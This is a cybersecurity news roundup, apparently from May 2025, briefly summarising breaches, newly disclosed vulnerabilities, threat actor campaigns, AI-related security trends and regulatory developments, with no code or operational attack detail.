Major Incidents and Breaches

  • Procolored Printer Malware Incident: Official drivers for Procolored printers were found to be distributing malware, including a remote access trojan and a cryptocurrency stealer, for at least six months.
  • Australian Human Rights Commission Data Breach: An internal error resulted in the public exposure of sensitive documents, increasing the risk of follow-on cyberattacks.
  • Coinbase Extortion: Coinbase was extorted following a cyberattack and is now offering a $20 million reward for information leading to the identification of the attackers, signalling a potentially new approach in incident response.
  • Nomad Bridge Crypto Hack – Arrest: Israeli authorities arrested a suspect linked to the $190 million Nomad Bridge cryptocurrency hack from August 2022.
  • US Crypto Theft Charges: Twelve additional individuals have been charged in the US for their alleged roles in a $230 million cryptocurrency theft and associated money laundering.
  • Email-Based Attacks and Cyber Insurance: Business email compromise (BEC) and funds transfer fraud (FTF) accounted for 60% of cyber insurance claims in 2024, underscoring the continued prevalence and impact of email-based threats.

Newly Discovered Vulnerabilities

  • Intel CPU Flaws: Researchers identified new vulnerabilities affecting all modern Intel CPUs, enabling sensitive memory leaks and facilitating Spectre v2-style attacks.
  • Chrome Zero-Day: CISA has warned that a recently patched high-severity Chrome browser vulnerability is being actively exploited in the wild.
  • Pwn2Own Zero-Days: Multiple zero-day vulnerabilities were exploited during Pwn2Own Berlin 2025, targeting Microsoft SharePoint, VMware ESXi, Oracle VirtualBox, and Red Hat Enterprise Linux.
  • Microsoft Windows 10 BitLocker Issue: Microsoft confirmed that May 2025 security updates are causing some Windows 10 systems to boot into BitLocker recovery mode unexpectedly.

Notable Threat Actor Activity

  • HTTPBot Botnet: A newly identified botnet, HTTPBot, has conducted over 200 targeted DDoS attacks, primarily affecting the gaming, technology, and education sectors.
  • Remcos RAT Campaign: Attackers are delivering fileless Remcos RAT using LNK files and MSHTA in PowerShell-based attacks, enhancing evasion and persistence.
  • Skitnet Post-Exploitation Tool: Ransomware gangs are increasingly deploying the Skitnet (“Bossnet”) malware for stealthy post-exploitation activities within compromised networks.
  • Dynamic DNS Abuse: Groups including Scattered Spider are leveraging dynamic DNS services to obfuscate their infrastructure and impersonate legitimate brands during phishing and other attacks.
  • Threat Actor Specialization: There is a trend toward increased specialization among threat actors, complicating attribution and defensive modelling.

Trends, Tools, and Tactics of Interest

  • Agentic AI Ransomware: Forecasts indicate that AI-enabled, agentic ransomware may emerge as early as this year, potentially transforming the ransomware threat landscape.
  • AI in Security and Offence: KnowBe4 is highlighting advancements in AI-driven human risk management, while OpenAI’s Codex (now integrated with ChatGPT) is being rolled out to automate programming tasks—raising both defensive and offensive security considerations.
  • Code-to-Cloud Security Gaps: Security teams are struggling to keep up with the pace of modern application development, particularly as organisations rapidly adopt cloud infrastructure.
  • Incident Response Metrics: Emphasis is being placed on developing and communicating clear metrics for Cybersecurity Incident Response Programs (CSIRPs) to improve transparency and decision-making.

Regulatory or Policy Developments

  • CISA Directive on Chrome Vulnerability: US federal agencies have been directed to address the actively exploited Chrome vulnerability, reflecting ongoing regulatory attention to patch management and rapid response.
  • Data Privacy Regulation Pressure: Increasing regulatory scrutiny is noted in relation to data privacy, with organisations urged to enhance data protection measures in response to tightening compliance requirements.